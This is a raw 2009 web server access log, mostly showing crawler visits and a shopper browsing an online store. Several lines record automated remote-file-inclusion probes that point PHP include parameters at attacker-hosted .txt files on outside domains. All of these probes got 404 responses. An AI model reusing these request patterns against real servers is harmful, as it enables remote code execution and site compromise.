128.241.53.238 - - [12/Aug/2009:05:17:01 -0400] "GET /logs/access_log.Q109072700//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.181.7.66 - - [12/Aug/2009:05:17:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.68.79 - - [12/Aug/2009:05:17:15 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.79 - - [12/Aug/2009:05:17:16 -0400] "GET /images/ACE_tutor_2Stage_Ridge.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.114.174.160 - - [12/Aug/2009:05:17:25 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.eusun.net/zboard//skin/ggambo7002_board/config/test.txt?? HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
210.114.174.160 - - [12/Aug/2009:05:17:26 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.eusun.net/zboard//skin/ggambo7002_board/config/test.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
121.169.189.169 - - [12/Aug/2009:05:13:09 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76416 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:32 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:32 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:32 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:32 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:32 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:33 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:17:34 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
110.45.138.141 - - [12/Aug/2009:05:17:50 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.eusun.net/zboard//skin/ggambo7002_board/config/test.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
110.45.138.141 - - [12/Aug/2009:05:17:50 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.eusun.net/zboard//skin/ggambo7002_board/config/test.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
64.27.6.186 - - [12/Aug/2009:05:18:02 -0400] "GET /logs/error_log.Q109072700%20%20//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:05:18:02 -0400] "GET /logs/access_log.Q109072700%20%20//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.174.114.20 - - [12/Aug/2009:05:18:16 -0400] "GET /logs/access_log.Q109062500//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.828"
69.174.114.20 - - [12/Aug/2009:05:18:16 -0400] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.828"
69.174.114.20 - - [12/Aug/2009:05:18:16 -0400] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.828"
194.126.110.134 - - [12/Aug/2009:05:18:17 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:18:17 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:18:17 -0400] "GET /logs/access_log.Q109052900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.174.114.20 - - [12/Aug/2009:05:18:17 -0400] "GET /logs/access_log.Q109062500//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.828"
69.174.114.20 - - [12/Aug/2009:05:18:17 -0400] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.828"
69.174.114.20 - - [12/Aug/2009:05:18:17 -0400] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.828"
65.55.207.24 - - [12/Aug/2009:05:18:22 -0400] "GET /logs/error_log.Q108012300 HTTP/1.0" 404 223 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.207 - - [12/Aug/2009:05:17:17 -0400] "GET /logs/access_log.Q109051400 HTTP/1.1" 200 6017281 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.126.110.134 - - [12/Aug/2009:05:18:42 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:18:43 -0400] "GET /logs/access_log.Q109052900/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:18:43 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:18:49 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:18:49 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.126.110.134 - - [12/Aug/2009:05:18:49 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.174.114.20 - - [12/Aug/2009:05:19:01 -0400] "GET /logs/error_log.Q109061400//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.828"
69.174.114.20 - - [12/Aug/2009:05:19:01 -0400] "GET /logs/error_log.Q109061400//language/lang_german/lang_main_album.php?phpbb_root_path=http://solelyyoursgem.com/img/admin.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.828"
121.169.189.169 - - [12/Aug/2009:05:19:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:11 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409D2506004AC3091+M37+ENG HTTP/1.1" 200 37540 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG HTTP/1.1" 200 37540 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:22 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:22 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:23 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:25 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:25 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
121.169.189.169 - - [12/Aug/2009:05:19:25 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
